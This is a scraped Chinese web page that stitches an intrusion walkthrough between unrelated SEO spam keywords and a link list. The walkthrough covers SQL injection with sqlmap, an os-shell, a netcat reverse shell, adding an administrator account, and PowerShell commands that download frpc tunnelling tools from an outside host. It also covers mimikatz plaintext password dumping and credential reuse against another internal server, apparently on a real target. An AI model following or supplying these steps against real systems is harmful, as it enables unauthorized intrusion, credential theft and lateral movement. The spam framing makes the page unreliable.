当前位置: 首页 > news >正文

wordpress自媒体博客模板深圳哪家网站建设好seo1888

wordpress自媒体博客模板,深圳哪家网站建设好seo1888,怎么管理好自己的网站,培训心得体会总结简短一、漏洞发现 拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入 进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限 os-shell执行命令太慢了,直接进行nc 反弹 执行base64 加密后的powershell命令&…

一、漏洞发现
拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入
在这里插入图片描述
进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限
在这里插入图片描述
os-shell执行命令太慢了,直接进行nc 反弹
执行base64 加密后的powershell命令,反弹回shell
在这里插入图片描述
nc shell下加账号和密码成功,mstsc远程连接发现失败
初步判断应该是在内网
配置好frpc.exe 和frpc.ini 将其下载到目标服务器
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
./frpc.exe
在frp管理页面看到目标端口已经上线
在这里插入图片描述
接下来进行mstsc远程连接
在这里插入图片描述
使用mimikatz 抓取其密码,直接报出明文
在这里插入图片描述
通过arp -a 发现其内网中还有一个活跃的服务器
在这里插入图片描述
直接在目标机上用爆出来的密码尝试远程登录,成功登录
在这里插入图片描述

二、总结一下思路
1 、找到sql注入,且是sa
2 、通过os-shell 反弹一个nc更容易执行命令
3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权
4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网
5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接
6 、登录成功后抓取用户名密码
7 、通过arp 查询相关的内网中的通信和路由
8 、尝试通过6爆出来的账号密码去碰撞其他内网机器

http://www.yayakq.cn/news/984783/

相关文章:

  • 快速的宝安网站建设全球排名前十网站
  • 商城手机网站怎么做50万做网站
  • 中国哪家网站做仿古做的好中铁招标在哪个平台
  • 怒江州住房和城乡建设局网站360地图怎么添加地址
  • 做游戏都需要什么网站吗公司网站建设哪个最好
  • 燕郊网站制作门户
  • 邵阳建设银行网站是多少营销型网站优化
  • 福州城乡建设发展总公司官方网站域名注册了怎么才能用
  • 网站建设公司dz000建设网站 后期的提成方案
  • 网站建设专员一定要会网站建设吗直播开放平台机构版
  • 地产网站建设方案网站制作详细教程
  • wordpress meta slider网站关键词优化建议
  • seo网站推广培训谷歌做网站推广
  • 做基本的网站建造师查询入口
  • 西宁网站建设报价壹君博贴心福建注册公司网上申请入口
  • 如何向google提交网站免费追剧永久免费app
  • 专业做数据的网站有哪些方面广告设计与制作课程
  • 岳阳设计网站推荐宝安建网站
  • 上海网站建设 s家电维修品牌网站建设
  • 临沂做网站的在哪里网站的宣传推广包括
  • 建电商网站做平台网站外包多少钱啊
  • 个人网站设计论文道客巴巴2个wordpress
  • 网站建设用哪种语言最好wordpress建站教程道一
  • 织梦网站密码忘记了apache多网站配置
  • 网站建设的要点是什么机械类外贸网站建设
  • 游戏网站开发视频百度seo报价
  • 常用网站代码商标图案设计自动生成
  • 教育培训类网站开发一对一直播网站开发
  • 太月星网站建设程序开发网页设计网站链接的基本形式
  • 建设网站的企业费用金华专业网站制作公司